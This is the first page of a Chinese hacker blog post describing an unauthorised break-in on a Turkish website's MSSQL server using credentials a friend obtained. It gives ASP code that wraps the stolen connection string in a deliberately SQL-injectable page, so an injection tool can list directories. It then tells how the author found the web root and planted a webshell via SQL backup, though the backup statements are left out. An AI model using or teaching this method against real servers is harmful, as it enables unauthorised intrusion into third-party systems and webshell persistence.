最近工作一直很忙，难得上下QQ。一上线就发现某JJ的头像狂闪，说是拿到了一个土耳奇XX站点服务器的SQL密码，是DB权限的，想问问我有啥哈袄办法，还说如果是SA就好。 真是废话 要是SA的话还至于来找我帮忙么？ 木JJ的...
于是打开SQL用查询分析器连上，发现了几个数据库估计是服务器的几个网站共用的这一个SQL server 于是立刻本地构造一个注射点，准备列目录。 构造注射点代码如下:

以下是引用片段： <% Set conn = Server.CreateObject("ADODB.Connection") conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=212.175.236.XXXX;UID=aXXXXX;pwd=XXXX;DATABASE=XXXX" %>

我隐藏掉了真实的用户跟密码。。这里我说下怎么利用这个MSSQL的用户名和密码。首先我们构造一个有注射漏洞的文件sql.asp，代码如下：

以下是引用片段： <!--#include file="conn.asp"--> <% dim rs,strSQL,id set rs=server.createobject("ADODB.recordset") id = request("id") strSQL ="select * from PE_GuestBook where GuestID=" & id rs.open strSQL,conn,1,3 rs.close %>

这里我们可以看到，直接用request("id") 取值没有过滤就构成了注入漏洞。我们在最前面加上<!--#include file="conn.asp"-->，就是这个文件包含了conn.asp，把这两个文件放在同一目录下。这里我在本机架设放在WEB目录下，用啊D检测一下，地址为http://127.0.0.1/sql.asp?id=1。因为sql.asp明显有注射漏洞，再包含conn.asp，所以一检测1就有注射点了，如图1


PS:如果看过我以前文章的朋友肯定会觉的熟悉吧 ，因为这招我已经用过了，呵呵这里再写一次一个是为了自己复习下，一个也是为了给不会的朋友再说下。
既然是DB权限我们最常用的就是列目录然后备份获得WEBSHELL了吧？嘿嘿。找了半天终于在D:\Inetpub\sevi发现了网站的根目录，为了防止出错我还多试了几遍，确定是WEB目录后马上使用SQL备份之..这里语句我就不写了，因为偶们直接用语句备份，所以成功的备份个小马上去 如图2 3

 

[1] [2] 下一页